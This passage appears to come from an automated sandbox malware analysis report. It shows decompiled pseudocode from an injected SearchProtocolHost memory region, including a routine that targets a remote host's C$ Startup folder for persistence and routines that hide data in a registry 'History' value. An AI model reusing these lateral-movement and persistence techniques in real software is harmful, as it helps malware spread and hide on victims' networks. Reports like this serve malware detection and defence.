                                                					_t48 = _t48 + 0x100;
                                                					_t14 =  &_v3352;
                                                					 *_t14 = _v3352 - 1;
                                                				} while ( *_t14 != 0);
                                                				E02FB3440(_t60,  &_v2572, 0, 0x208);
                                                				wsprintfW( &_v2572, L"\\\\%ws\\%ws",  &_v3348, L"c$\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup");
                                                				E02FAA760(_t48,  &_v2564,  &_v3340, _t60);
                                                				_pop(_t68);
                                                				return E02FB0A5D(_a8 ^ _t72 + 0x1c, _t68);
                                                 			}

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 02FAAC44
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 02FAAC5A
                                                • wsprintfW.USER32 ref: 02FAACCE
                                                • wsprintfW.USER32 ref: 02FAAD25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidewsprintf
                                                • String ID: \\%ws\%ws$c$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
                                                • API String ID: 1452142677-3812071424
                                                • Opcode ID: d81822be72f92068273bf5d7104b0e2d86c75a590ce8c8427126d5bdf9ca99f8
                                                • Instruction ID: 3eb4e92ee6eefba055ac909585cc9218e72715c03b868b24a0393916a5cd58c4
                                                • Opcode Fuzzy Hash: d81822be72f92068273bf5d7104b0e2d86c75a590ce8c8427126d5bdf9ca99f8
                                                • Instruction Fuzzy Hash: DD31D9B19443096BE220DA50DD46FDBB3DCAF44750F10092AB758971C0EA70A5088BD6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E02FA4CE0(char* _a8, intOrPtr* _a12) {
                                                				int _v8;
                                                				void* _v12;
                                                				int _v16;
                                                				void* __edi;
                                                				int _t22;
                                                				int _t27;
                                                				intOrPtr* _t32;
                                                
                                                				_v12 = 0;
                                                				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0x20019,  &_v12) == 0) {
                                                					_v16 = 0;
                                                					_v8 = 0;
                                                					if(RegQueryValueExA(_v12, "History", 0,  &_v16, 0,  &_v8) != 0) {
                                                						goto L1;
                                                					} else {
                                                						_t22 = _v8;
                                                						if(_t22 == 0) {
                                                							goto L1;
                                                						} else {
                                                							_t32 = _a12;
                                                							_t30 =  *_t32;
                                                							if( *_t32 < _t22) {
                                                								L8:
                                                								return 0;
                                                							} else {
                                                								E02FB3440(_t32, _a8, 0, _t30);
                                                								if(RegQueryValueExA(_v12, "History", 0, 0, _a8,  &_v8) != 0) {
                                                									goto L8;
                                                								} else {
                                                									_t27 = _v8;
                                                									if(_t27 == 0) {
                                                										goto L8;
                                                									} else {
                                                										 *_t32 = _t27;
                                                										RegCloseKey(_v12);
                                                										return 1;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					return 0;
                                                				}
                                                 			}

                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00020019,?), ref: 02FA4D02
                                                • RegQueryValueExA.ADVAPI32(00000000,History,00000000,00000000,00000000,00000800), ref: 02FA4D34
                                                • RegQueryValueExA.ADVAPI32(00000000,History,00000000,00000000,00000000,00000000), ref: 02FA4D70
                                                • RegCloseKey.ADVAPI32(00000000), ref: 02FA4D86
                                                Strings
                                                • History, xrefs: 02FA4D2C, 02FA4D68
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 02FA4CF8
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID: History$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1586453840-664128107
                                                • Opcode ID: c63bac5c4d925a07f6af09b72845b5ac74292d8b2c5ef50941696e66b2b356ca
                                                • Instruction ID: 7d92bcf235c629ac1b79ede251f5f666d547320e2dd0dd5ab659db4754ba6c00
                                                • Opcode Fuzzy Hash: c63bac5c4d925a07f6af09b72845b5ac74292d8b2c5ef50941696e66b2b356ca
                                                • Instruction Fuzzy Hash: 1B113074B80209BBEF108E91ED05FADF7B8EF44B54F2000A5AD09E2280D7B1AA159A94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E02FA4C60(char* _a8, int _a12) {
                                                				void* _v8;
                                                				int _v12;
                                                				int _t11;
                                                				long _t13;
                                                
                                                				_v8 = 0;
                                                				_v12 = 1;
                                                				_t11 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
                                                				if(_t11 != 0) {
                                                					L3:
                                                					return 0;
                                                				} else {
                                                					_t13 = RegSetValueExA(_v8, "History", _t11, 3, _a8, _a12);
                                                					_push(_v8);
                                                					if(_t13 == 0) {
                                                						RegCloseKey();
                                                						return 1;
                                                					} else {
                                                						RegCloseKey();
                                                						goto L3;
                                                					}
                                                				}
                                                 			}

                                                APIs
                                                • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00000000,00000000,000F003F,00000000,00000000,00000801), ref: 02FA4C93
                                                • RegSetValueExA.ADVAPI32(00000000,History,00000000,00000003,?,?), ref: 02FA4CAE
                                                • RegCloseKey.ADVAPI32(00000000), ref: 02FA4CBB
                                                • RegCloseKey.ADVAPI32(00000000), ref: 02FA4CC7
                                                Strings
                                                • History, xrefs: 02FA4CA6
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 02FA4C89
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Close$CreateValue
                                                • String ID: History$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1009429713-664128107
                                                • Opcode ID: bf684f9cf543056f35c4064a3c94f9967707086112fae1e8de49bd74e0888db2
                                                • Instruction ID: 02f6dca6a2245b55fe4ed3e6294f0a8721edbd647a9524bc7bf1b8b20167e5ec
                                                • Opcode Fuzzy Hash: bf684f9cf543056f35c4064a3c94f9967707086112fae1e8de49bd74e0888db2
                                                • Instruction Fuzzy Hash: 6FF06870BC020DBBEF209F90DD06FA9B77CFB04B55F600554BE09F6180D7B1A6249695
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E02FC1654(signed int _a4, void* _a8, unsigned int _a12) {
                                                				signed int _v5;
                                                				char _v6;
                                                				void* _v12;
                                                				unsigned int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				void* _v32;
                                                				long _v36;
                                                				void* _v40;
                                                				long _v44;
                                                				signed int* _t143;
                                                				signed int _t145;
                                                				intOrPtr _t149;
                                                				signed int _t153;
                                                				signed int _t155;
                                                				signed char _t157;
                                                				unsigned int _t158;
                                                				intOrPtr _t162;
                                                				void* _t163;
                                                				signed int _t164;
                                                				signed int _t167;
                                                				long _t168;
                                                				intOrPtr _t175;
                                                				signed int _t176;
                                                				intOrPtr _t178;
                                                				signed int _t180;
                                                				signed int _t184;
                                                				char _t191;
                                                				char* _t192;
                                                				char _t199;
                                                				char* _t200;
                                                				signed char _t211;
                                                				signed int _t213;
                                                				long _t215;
                                                				signed int _t216;
                                                				char _t218;
                                                				signed char _t222;
                                                				signed int _t223;
                                                				unsigned int _t224;
                                                				intOrPtr _t225;
                                                				unsigned int _t229;
                                                				signed int _t231;
                                                				signed int _t232;
                                                				signed int _t233;
                                                				signed int _t234;
                                                				signed int _t235;
                                                				signed char _t236;
                                                				signed int _t237;
                                                				signed int _t239;
                                                				signed int _t240;
                                                				signed int _t241;
                                                				signed int _t242;
                                                				signed int _t246;
                                                				void* _t248;
                                                				void* _t249;
                                                
                                                				_t213 = _a4;
                                                				if(_t213 != 0xfffffffe) {
                                                					__eflags = _t213;
                                                					if(_t213 < 0) {
                                                						L58:
                                                						_t143 = E02FB5D30();
                                                						 *_t143 =  *_t143 & 0x00000000;
                                                						__eflags =  *_t143;
                                                						 *((intOrPtr*)(E02FB5D43())) = 9;
                                                						L59:
                                                						_t145 = E02FB5C10();
                                                						goto L60;
                                                					}
                                                					__eflags = _t213 -  *0x2fd6680;
                                                					if(_t213 >=  *0x2fd6680) {
                                                						goto L58;
                                                					}
                                                					_v24 = 1;
                                                					_t239 = _t213 >> 6;
                                                					_t235 = (_t213 & 0x0000003f) * 0x30;
                                                					_v20 = _t239;
                                                					_t149 =  *((intOrPtr*)(0x2fd6480 + _t239 * 4));
                                                					_v28 = _t235;
                                                					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                                                					_v5 = _t222;
                                                					__eflags = _t222 & 0x00000001;
                                                					if((_t222 & 0x00000001) == 0) {
                                                						goto L58;
                                                					}
                                                					_t223 = _a12;
                                                					__eflags = _t223 - 0x7fffffff;
                                                					if(_t223 <= 0x7fffffff) {
                                                						__eflags = _t223;
                                                						if(_t223 == 0) {
                                                							L57:
                                                							return 0;
                                                						}
                                                						__eflags = _v5 & 0x00000002;
                                                						if((_v5 & 0x00000002) != 0) {
                                                							goto L57;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							goto L6;
                                                						}
                                                						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                                                						_v5 = _t153;
                                                						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                                                						_t246 = 0;
                                                						_t155 = _t153 - 1;
                                                						__eflags = _t155;
                                                						if(_t155 == 0) {
                                                							_t236 = _v24;
                                                							_t157 =  !_t223;
                                                							__eflags = _t236 & _t157;
                                                							if((_t236 & _t157) != 0) {
                                                								_t158 = 4;
                                                								_t224 = _t223 >> 1;
                                                								_v16 = _t158;
                                                								__eflags = _t224 - _t158;
                                                								if(_t224 >= _t158) {
                                                									_t158 = _t224;
                                                									_v16 = _t224;
                                                								}
                                                								_t246 = E02FB7882(_t224, _t158);
                                                								E02FB7848(0);
                                                								E02FB7848(0);
                                                								_t249 = _t248 + 0xc;
                                                								_v12 = _t246;
                                                								__eflags = _t246;
                                                								if(_t246 != 0) {
                                                									_t162 = E02FC09B4(_t213, 0, 0, _v24);
                                                									_t225 =  *((intOrPtr*)(0x2fd6480 + _t239 * 4));
                                                									_t248 = _t249 + 0x10;
                                                									_t240 = _v28;
                                                									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                                                									_t163 = _t246;
                                                									 *(_t240 + _t225 + 0x24) = _t236;
                                                									_t235 = _t240;
                                                									_t223 = _v16;
                                                									L21:
                                                									_t241 = 0;
                                                									_v40 = _t163;
                                                									_t215 =  *((intOrPtr*)(0x2fd6480 + _v20 * 4));
                                                									_v36 = _t215;
                                                									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                                                									_t216 = _a4;
                                                									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                                                										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                                                										_v6 = _t218;
                                                										__eflags = _t218 - 0xa;
                                                										_t216 = _a4;
                                                										if(_t218 != 0xa) {
                                                											__eflags = _t223;
                                                											if(_t223 != 0) {
                                                												_t241 = _v24;
                                                												 *_t163 = _v6;
                                                												_t216 = _a4;
                                                												_t232 = _t223 - 1;
                                                												__eflags = _v5;
                                                												_v12 = _t163 + 1;
                                                												_v16 = _t232;
                                                												 *((char*)(_t235 +  *((intOrPtr*)(0x2fd6480 + _v20 * 4)) + 0x2a)) = 0xa;
                                                												if(_v5 != 0) {
                                                													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x2fd6480 + _v20 * 4)) + 0x2b));
                                                													_v6 = _t191;
                                                													__eflags = _t191 - 0xa;
                                                													if(_t191 != 0xa) {
                                                														__eflags = _t232;
                                                														if(_t232 != 0) {
                                                															_t192 = _v12;
                                                															_t241 = 2;
                                                															 *_t192 = _v6;
                                                															_t216 = _a4;
                                                															_t233 = _t232 - 1;
                                                															_v12 = _t192 + 1;
                                                															_v16 = _t233;
                                                															 *((char*)(_t235 +  *((intOrPtr*)(0x2fd6480 + _v20 * 4)) + 0x2b)) = 0xa;
                                                															__eflags = _v5 - _v24;
                                                															if(_v5 == _v24) {
                                                																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x2fd6480 + _v20 * 4)) + 0x2c));
                                                																_v6 = _t199;
                                                																__eflags = _t199 - 0xa;
                                                																if(_t199 != 0xa) {
                                                																	__eflags = _t233;
                                                																	if(_t233 != 0) {
                                                																		_t200 = _v12;
                                                																		_t241 = 3;
                                                																		 *_t200 = _v6;
                                                																		_t216 = _a4;
                                                																		_t234 = _t233 - 1;
                                                																		__eflags = _t234;
                                                																		_v12 = _t200 + 1;
                                                																		_v16 = _t234;
                                                																		 *((char*)(_t235 +  *((intOrPtr*)(0x2fd6480 + _v20 * 4)) + 0x2c)) = 0xa;
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                									_t164 = E02FBF33A(_t216);
                                                									__eflags = _t164;
                                                									if(_t164 == 0) {
                                                										L41:
                                                										_v24 = 0;
                                                										L42:
                                                										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
                                                										__eflags = _t167;
                                                										if(_t167 == 0) {
                                                											L53:
                                                											_t168 = GetLastError();
                                                											_t241 = 5;
                                                											__eflags = _t168 - _t241;
                                                											if(_t168 != _t241) {
                                                												__eflags = _t168 - 0x6d;
                                                												if(_t168 != 0x6d) {
                                                													L37:
                                                													E02FB5D0D(_t168);
                                                													goto L38;
                                                												}
                                                												_t242 = 0;
                                                												goto L39;
                                                											}
                                                											 *((intOrPtr*)(E02FB5D43())) = 9;
                                                											 *(E02FB5D30()) = _t241;
                                                											goto L38;
                                                										}
                                                										_t229 = _a12;
                                                										__eflags = _v36 - _t229;
                                                										if(_v36 > _t229) {
                                                											goto L53;
                                                										}
                                                										_t242 = _t241 + _v36;
                                                										__eflags = _t242;
                                                										L45:
                                                										_t237 = _v28;
                                                										_t175 =  *((intOrPtr*)(0x2fd6480 + _v20 * 4));
                                                										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                                                										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                                                											__eflags = _v5 - 2;
                                                											if(_v5 == 2) {
                                                												__eflags = _v24;
                                                												_push(_t242 >> 1);
                                                												_push(_v40);
                                                												_push(_t216);
                                                												if(_v24 == 0) {
                                                													_t176 = E02FC11B0();
                                                												} else {
                                                													_t176 = E02FC14C0();
                                                												}
                                                											} else {
                                                												_t230 = _t229 >> 1;
                                                												__eflags = _t229 >> 1;
                                                												_t176 = E02FC1370(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                                                											}
                                                											_t242 = _t176;
                                                										}
                                                										goto L39;
                                                									}
                                                									_t231 = _v28;
                                                									_t178 =  *((intOrPtr*)(0x2fd6480 + _v20 * 4));
                                                									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                                                									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                                                										goto L41;
                                                									}
                                                									_t180 = GetConsoleMode(_v32,  &_v44);
                                                									__eflags = _t180;
                                                									if(_t180 == 0) {
                                                										goto L41;
                                                									}
                                                									__eflags = _v5 - 2;
                                                									if(_v5 != 2) {
                                                										goto L42;
                                                									}
                                                									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                                                									__eflags = _t184;
                                                									if(_t184 != 0) {
                                                										_t229 = _a12;
                                                										_t242 = _t241 + _v36 * 2;
                                                										goto L45;
                                                									}
                                                									_t168 = GetLastError();
                                                									goto L37;
                                                								} else {
                                                									 *((intOrPtr*)(E02FB5D43())) = 0xc;
                                                									 *(E02FB5D30()) = 8;
                                                									L38:
                                                									_t242 = _t241 | 0xffffffff;
                                                									__eflags = _t242;
                                                									L39:
                                                									E02FB7848(_t246);
                                                									return _t242;
                                                								}
                                                							}
                                                							L15:
                                                							 *(E02FB5D30()) =  *_t206 & _t246;
                                                							 *((intOrPtr*)(E02FB5D43())) = 0x16;
                                                							E02FB5C10();
                                                							goto L38;
                                                						}
                                                						__eflags = _t155 != 1;
                                                						if(_t155 != 1) {
                                                							L13:
                                                							_t163 = _a8;
                                                							_v16 = _t223;
                                                							_v12 = _t163;
                                                							goto L21;
                                                						}
                                                						_t211 =  !_t223;
                                                						__eflags = _t211 & 0x00000001;
                                                						if((_t211 & 0x00000001) == 0) {
                                                							goto L15;
                                                						}
                                                						goto L13;
                                                					}
                                                					L6:
                                                					 *(E02FB5D30()) =  *_t151 & 0x00000000;
                                                					 *((intOrPtr*)(E02FB5D43())) = 0x16;
                                                					goto L59;
                                                				} else {
                                                					 *(E02FB5D30()) =  *_t212 & 0x00000000;
                                                					_t145 = E02FB5D43();
                                                					 *_t145 = 9;
                                                					L60:
                                                					return _t145 | 0xffffffff;
                                                				}
                                                			}



























































                                                0x02fc199f
                                                0x02fc199f
                                                0x02fc197b
                                                0x02fc197b
                                                0x02fc197b
                                                0x02fc1986
                                                0x02fc198b
                                                0x02fc198e
                                                0x02fc198e
                                                0x00000000
                                                0x02fc1973
                                                0x02fc18ca
                                                0x02fc18cd
                                                0x02fc18d4
                                                0x02fc18d9
                                                0x00000000
                                                0x00000000
                                                0x02fc18e2
                                                0x02fc18e8
                                                0x02fc18ea
                                                0x00000000
                                                0x00000000
                                                0x02fc18ec
                                                0x02fc18f0
                                                0x00000000
                                                0x00000000
                                                0x02fc1904
                                                0x02fc190a
                                                0x02fc190c
                                                0x02fc1930
                                                0x02fc1933
                                                0x00000000
                                                0x02fc1933
                                                0x02fc190e
                                                0x00000000
                                                0x02fc178a
                                                0x02fc178f
                                                0x02fc179a
                                                0x02fc191b
                                                0x02fc191b
                                                0x02fc191b
                                                0x02fc191e
                                                0x02fc191f
                                                0x00000000
                                                0x02fc1927
                                                0x02fc1788
                                                0x02fc173d
                                                0x02fc1742
                                                0x02fc1749
                                                0x02fc174f
                                                0x00000000
                                                0x02fc174f
                                                0x02fc1717
                                                0x02fc171a
                                                0x02fc1724
                                                0x02fc1724
                                                0x02fc1727
                                                0x02fc172a
                                                0x00000000
                                                0x02fc172a
                                                0x02fc171e
                                                0x02fc1720
                                                0x02fc1722
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fc1722
                                                0x02fc16ce
                                                0x02fc16d3
                                                0x02fc16db
                                                0x00000000
                                                0x02fc1666
                                                0x02fc166b
                                                0x02fc166e
                                                0x02fc1673
                                                0x02fc1a00
                                                0x00000000
                                                0x02fc1a00

                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3376599e1cd4072d04871c5594df8fb3123d133f340c993a9a3cb1d65de7228c
                                                • Instruction ID: 99a3f762ce40fc82b25e04245c6eb4f6903f93aa47aae6c1b55206c78ed93941
                                                • Opcode Fuzzy Hash: 3376599e1cd4072d04871c5594df8fb3123d133f340c993a9a3cb1d65de7228c
                                                • Instruction Fuzzy Hash: 1FC10675E0824A9FDF16DFA8CA50BEEBBB5AF09394F64054CD609A7382C3349951CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E02FC0E01(char* _a4, short* _a8) {
                                                				int _v8;
                                                				void* __ecx;
                                                				short* _t10;
                                                				short* _t14;
                                                				int _t15;
                                                				short* _t16;
                                                				void* _t26;
                                                				int _t27;
                                                				void* _t29;
                                                				short* _t35;
                                                				short* _t39;
                                                				short* _t40;
                                                
                                                				_push(_t29);
                                                				if(_a4 != 0) {
                                                					_t39 = _a8;
                                                					__eflags = _t39;
                                                					if(__eflags != 0) {
                                                						_push(_t26);
                                                						E02FB7D59(_t29, __eflags);
                                                						asm("sbb ebx, ebx");
                                                						_t35 = 0;
                                                						_t27 = _t26 + 1;
                                                						 *_t39 = 0;
                                                						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                                                						_v8 = _t10;
                                                						__eflags = _t10;
                                                						if(_t10 != 0) {
                                                							_t40 = E02FB7882(_t29, _t10 + _t10);
                                                							__eflags = _t40;
                                                							if(_t40 != 0) {
                                                								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                                                								__eflags = _t15;
                                                								if(_t15 != 0) {
                                                									_t16 = _t40;
                                                									_t40 = 0;
                                                									_t35 = 1;
                                                									__eflags = 1;
                                                									 *_a8 = _t16;
                                                								} else {
                                                									E02FB5D0D(GetLastError());
                                                								}
                                                							}
                                                							E02FB7848(_t40);
                                                							_t14 = _t35;
                                                						} else {
                                                							E02FB5D0D(GetLastError());
                                                							_t14 = 0;
                                                						}
                                                					} else {
                                                						 *((intOrPtr*)(E02FB5D43())) = 0x16;
                                                						E02FB5C10();
                                                						_t14 = 0;
                                                					}
                                                					return _t14;
                                                				}
                                                				 *((intOrPtr*)(E02FB5D43())) = 0x16;
                                                				E02FB5C10();
                                                				return 0;
                                                			}
















                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b30f83f482746986cab3cd8e2d5ff4edbe050e22d69607b59f07b110a9315c80
                                                • Instruction ID: 267e8b8d9af823e188c213fa209fbd460e0a43219ef089af45763eb4d37c2b0e
                                                • Opcode Fuzzy Hash: b30f83f482746986cab3cd8e2d5ff4edbe050e22d69607b59f07b110a9315c80
                                                • Instruction Fuzzy Hash: 4B11E7B2998116BFDB122F769D08EAB7A59EF857F0B60061DFA15D7240DF348901CAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E02FB361C(void* __ecx) {
                                                				void* _t5;
                                                				void* _t6;
                                                				void* _t9;
                                                				void* _t15;
                                                				long _t16;
                                                				void* _t17;
                                                				void* _t20;
                                                				void* _t21;
                                                
                                                				if( *0x2fd0450 != 0xffffffff) {
                                                					_t16 = GetLastError();
                                                					_t20 = E02FB3E33(__eflags,  *0x2fd0450);
                                                					_t9 = _t15;
                                                					__eflags = _t20;
                                                					if(_t20 == 0) {
                                                						_t21 = E02FB78D0(_t9, 1, 0x28);
                                                						__eflags = _t21;
                                                						if(__eflags == 0) {
                                                							L6:
                                                							SetLastError(_t16);
                                                							_t17 = 0;
                                                						} else {
                                                							_t6 = E02FB3E6D(__eflags,  *0x2fd0450, _t21);
                                                							__eflags = _t6;
                                                							if(_t6 != 0) {
                                                								SetLastError(_t16);
                                                								_t17 = _t21;
                                                								_t21 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								goto L6;
                                                							}
                                                						}
                                                						E02FB7848(_t21);
                                                						_t5 = _t17;
                                                					} else {
                                                						SetLastError(_t16);
                                                						_t5 = _t20;
                                                					}
                                                					return _t5;
                                                				} else {
                                                					return 0;
                                                				}
                                                			}












                                                APIs
                                                • GetLastError.KERNEL32(?,?,02FB3613,02FB29D1,02FCDD18,00000010,02FB219C,?,?,?,?,?,00000000,?), ref: 02FB362A
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02FB3638
                                                • SetLastError.KERNEL32(00000000,00000000,?), ref: 02FB3645
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ErrorLast$Value___vcrt_
                                                • String ID:
                                                • API String ID: 483936075-0
                                                • Opcode ID: a22be44e00a5e78cde134c0919ed7d51e326e7b492e21924d26290b746bb579d
                                                • Instruction ID: c3fb58d7a410867c365dfd90c2aef46cac7a5fd993cc2328603b47852441b0db
                                                • Opcode Fuzzy Hash: a22be44e00a5e78cde134c0919ed7d51e326e7b492e21924d26290b746bb579d
                                                • Instruction Fuzzy Hash: D8F0D63BDC622556871322367D08EAE7652AF86BF1B610599E600E7280CF1068119BD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E02FB3060(void* __ebx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				char _v5;
                                                				signed int _v12;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				long _v32;
                                                				WCHAR* _v36;
                                                				struct HINSTANCE__* _v40;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t54;
                                                				long _t56;
                                                				signed int _t62;
                                                				intOrPtr _t63;
                                                				void* _t64;
                                                				intOrPtr _t67;
                                                				long _t69;
                                                				intOrPtr _t72;
                                                				intOrPtr _t74;
                                                				signed int _t76;
                                                				char _t78;
                                                				void* _t90;
                                                				intOrPtr _t91;
                                                				WCHAR* _t93;
                                                				intOrPtr _t96;
                                                				long _t98;
                                                				intOrPtr* _t100;
                                                				void* _t103;
                                                				void* _t104;
                                                				void* _t110;
                                                
                                                				_t72 = _a8;
                                                				_push(_t90);
                                                				_v5 = 0;
                                                				_t96 = _t72 + 0x10;
                                                				_push(_t96);
                                                				_v16 = 1;
                                                				_v20 = _t96;
                                                				_v12 =  *(_t72 + 8) ^  *0x2fcf008;
                                                				_t54 = E02FB3020(_t90, _t96,  *(_t72 + 8) ^  *0x2fcf008);
                                                				_t91 = _a12;
                                                				_push(_t91);
                                                				E02FB1802(_t54);
                                                				_t56 = _a4;
                                                				_t104 = _t103 + 0xc;
                                                				if(( *(_t56 + 4) & 0x00000066) != 0) {
                                                					__eflags =  *((intOrPtr*)(_t72 + 0xc)) - 0xfffffffe;
                                                					if( *((intOrPtr*)(_t72 + 0xc)) != 0xfffffffe) {
                                                						E02FB4097(_t72, 0xfffffffe, _t96, 0x2fcf008);
                                                						goto L18;
                                                					}
                                                					goto L19;
                                                				} else {
                                                					_v32 = _t56;
                                                					_v28 = _t91;
                                                					_t91 =  *((intOrPtr*)(_t72 + 0xc));
                                                					 *((intOrPtr*)(_t72 - 4)) =  &_v32;
                                                					if(_t91 == 0xfffffffe) {
                                                						L19:
                                                						return _v16;
                                                					} else {
                                                						do {
                                                							_t76 = _v12;
                                                							_t19 = _t91 + 2; // 0x3
                                                							_t62 = _t91 + _t19 * 2;
                                                							_t74 =  *((intOrPtr*)(_t76 + _t62 * 4));
                                                							_t63 = _t76 + _t62 * 4;
                                                							_t77 =  *((intOrPtr*)(_t63 + 4));
                                                							_v24 = _t63;
                                                							if( *((intOrPtr*)(_t63 + 4)) == 0) {
                                                								_t78 = _v5;
                                                								goto L12;
                                                							} else {
                                                								_t64 = E02FB404E(_t77, _t96);
                                                								_t78 = 1;
                                                								_v5 = 1;
                                                								_t110 = _t64;
                                                								if(_t110 < 0) {
                                                									_v16 = 0;
                                                									L18:
                                                									_push(_t96);
                                                									E02FB3020(_t91, _t96, _v12);
                                                									goto L19;
                                                								} else {
                                                									if(_t110 <= 0) {
                                                										goto L12;
                                                									} else {
                                                										_t65 = _a4;
                                                										if( *_a4 == 0xe06d7363) {
                                                											_t112 =  *0x2fc55dc;
                                                											if( *0x2fc55dc != 0) {
                                                												_t65 = E02FC3930(_t112, 0x2fc55dc);
                                                												_t104 = _t104 + 4;
                                                												if(_t65 != 0) {
                                                													_t100 =  *0x2fc55dc; // 0x2fb1e94
                                                													L02FB162B();
                                                													_t65 =  *_t100(_a4, 1);
                                                													_t96 = _v20;
                                                													_t104 = _t104 + 8;
                                                												}
                                                											}
                                                										}
                                                										E02FB407E(_t65, _a8, _a4);
                                                										_t67 = _a8;
                                                										if( *((intOrPtr*)(_t67 + 0xc)) != _t91) {
                                                											E02FB4097(_t67, _t91, _t96, 0x2fcf008);
                                                											_t67 = _a8;
                                                										}
                                                										_push(_t96);
                                                										 *((intOrPtr*)(_t67 + 0xc)) = _t74;
                                                										E02FB3020(_t91, _t96, _v12);
                                                										E02FB4065();
                                                										asm("int3");
                                                										_push(_t96);
                                                										_t98 = _v32;
                                                										_push(_t91);
                                                										_t93 = _v36;
                                                										_t69 = GetModuleFileNameW(_v40, _t93, _t98);
                                                										if(_t98 != 0) {
                                                											if(_t69 == 0) {
                                                												 *_t93 = 0;
                                                											}
